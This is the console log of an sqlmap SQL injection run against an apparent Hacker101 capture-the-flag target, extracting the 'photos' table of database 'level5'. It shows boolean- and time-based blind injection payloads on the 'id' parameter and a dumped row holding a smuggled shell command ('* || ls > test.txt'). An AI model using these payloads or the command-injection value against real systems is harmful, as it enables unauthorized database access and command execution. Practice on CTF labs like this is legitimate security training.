        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.9#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:07:58 /2022-10-16/

[21:07:58] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[21:07:58] [INFO] resuming back-end DBMS 'mysql' 
[21:07:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7133=7133

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: id=1 OR SLEEP(5)
---
[21:08:01] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.21.4.1
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:08:01] [INFO] fetching columns for table 'photos' in database 'level5'

[21:08:01] [INFO] retrieved: 4
[21:08:10] [INFO] retrieving the length of query output

[21:08:10] [INFO] retrieved: 2
[21:08:17] [INFO] retrieved: __
[21:08:17] [INFO] retrieved: 
[21:08:31] [INFO] retrieved: id           
[21:08:31] [INFO] retrieved: id
[21:08:31] [INFO] retrieving the length of query output

[21:08:31] [INFO] retrieved: 5
[21:08:38] [INFO] retrieved: _____
[21:08:38] [INFO] retrieved: 
[21:08:55] [INFO] retrieved: title           
[21:08:55] [INFO] retrieved: title
[21:08:55] [INFO] retrieving the length of query output

[21:08:55] [INFO] retrieved: 8
[21:09:04] [INFO] retrieved: ________
[21:09:04] [INFO] retrieved: 
[21:09:17] [INFO] retrieved: filename           
[21:09:18] [INFO] retrieved: filename
[21:09:18] [INFO] retrieving the length of query output

[21:09:18] [INFO] retrieved: 6
[21:09:26] [INFO] retrieved: ______
[21:09:26] [INFO] retrieved: 
[21:09:42] [INFO] retrieved: parent           
[21:09:42] [INFO] retrieved: parent
[21:09:42] [INFO] fetching entries for table 'photos' in database 'level5'
[21:09:42] [INFO] fetching number of entries for table 'photos' in database 'level5'

[21:09:42] [INFO] retrieved: 3
[21:09:50] [INFO] retrieving the length of query output

[21:09:50] [INFO] retrieved: 18
[21:10:01] [INFO] retrieved: __________________
[21:10:01] [INFO] retrieved: 
[21:10:29] [INFO] retrieved: files/adorable.jpg             
[21:10:29] [INFO] retrieved: files/adorable.jpg
[21:10:29] [INFO] retrieving the length of query output

[21:10:29] [INFO] retrieved: 1

[21:10:39] [INFO] retrieved: 1
[21:10:47] [INFO] retrieving the length of query output

[21:10:47] [INFO] retrieved: 1

[21:10:53] [INFO] retrieved: 1
[21:11:01] [INFO] retrieving the length of query output

[21:11:01] [INFO] retrieved: 16
[21:11:14] [INFO] retrieved: ________________
[21:11:14] [INFO] retrieved: 
[21:11:38] [INFO] retrieved: Utterly adorable             
[21:11:38] [INFO] retrieved: Utterly adorable
[21:11:38] [INFO] retrieving the length of query output

[21:11:38] [INFO] retrieved: 18
[21:11:54] [INFO] retrieved: __________________
[21:11:54] [INFO] retrieved: 
[21:12:23] [INFO] retrieved: files/purrfect.jpg             
[21:12:23] [INFO] retrieved: files/purrfect.jpg
[21:12:23] [INFO] retrieving the length of query output

[21:12:23] [INFO] retrieved: 1

[21:12:29] [INFO] retrieved: 2
[21:12:43] [INFO] retrieving the length of query output

[21:12:43] [INFO] retrieved: 1

[21:12:47] [INFO] retrieved: 1
[21:12:56] [INFO] retrieving the length of query output

[21:12:56] [INFO] retrieved: 8
[21:13:08] [INFO] retrieved: ________
[21:13:08] [INFO] retrieved: 
[21:13:27] [INFO] retrieved: Purrfect           
[21:13:27] [INFO] retrieved: Purrfect
[21:13:27] [INFO] retrieving the length of query output

[21:13:27] [INFO] retrieved: 18
[21:13:43] [INFO] retrieved: __________________
[21:13:43] [INFO] retrieved: 
[21:14:13] [INFO] retrieved: * || ls > test.txt             
[21:14:13] [INFO] retrieved: * || ls > test.txt
[21:14:13] [INFO] retrieving the length of query output

[21:14:13] [INFO] retrieved: 1

[21:14:23] [INFO] retrieved: 3
[21:14:34] [INFO] retrieving the length of query output

[21:14:34] [INFO] retrieved: 1

[21:14:39] [INFO] retrieved: 1
[21:14:47] [INFO] retrieving the length of query output

[21:14:47] [INFO] retrieved: 18
[21:14:58] [INFO] retrieved: __________________
[21:14:58] [INFO] retrieved: 
[21:15:34] [INFO] retrieved: * || ls > test.txt             
[21:15:34] [INFO] retrieved: * || ls > test.txt
Database: level5
Table: photos
[3 entries]
+----+--------------------+--------+--------------------+
| id | title              | parent | filename           |
+----+--------------------+--------+--------------------+
| 1  | Utterly adorable   | 1      | files/adorable.jpg |
| 2  | Purrfect           | 1      | files/purrfect.jpg |
| 3  | * || ls > test.txt | 1      | * || ls > test.txt |
+----+--------------------+--------+--------------------+

[21:15:34] [INFO] table 'level5.photos' dumped to CSV file '/home/kali/.local/share/sqlmap/output/0780f37509b00ac83f760b8747e31396.ctf.hacker101.com/dump/level5/photos.csv'
[21:15:34] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 459 times
[21:15:34] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/0780f37509b00ac83f760b8747e31396.ctf.hacker101.com'

[*] ending @ 21:15:34 /2022-10-16/

